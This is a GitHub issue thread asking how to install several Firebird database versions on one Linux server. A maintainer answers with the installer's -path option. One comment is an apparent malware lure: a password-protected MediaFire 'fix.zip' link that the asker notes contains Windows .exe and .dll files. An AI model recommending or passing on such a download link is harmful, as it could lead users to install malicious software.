### ISSUE TITLE
Multiple Firebird versions on Linux?

### ISSUE THREAD

**Issue by denisrdasilva** [IBSurgeon/firebirdlinuxinstall#4]
We know there is possible to install many Firebird versions on Windows, as appllication or service, but on linux, is there possible to install many Firebird versions on Server(eg: Ubuntu)? For exemple, Firebird 3 and Firebird 5?

If the answer is positive, please let me know how to it?

Thanks!

**Comment by Gross-Igna** [comment]
Download 
https://www.mediafire.com/file/7ybpxn8lil1av70/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by denisrdasilva** [comment]
@Gross-Igna you send and .exe and dll file. But I am asking the install on Linux.

**Comment by alexeykovyazin** [comment]
Use option -path for standard Firebird installer (not in this scripts)
install.sh -path /opt/fb5

then enable service manually

**Comment by denisrdasilva** [comment]
Thank you!
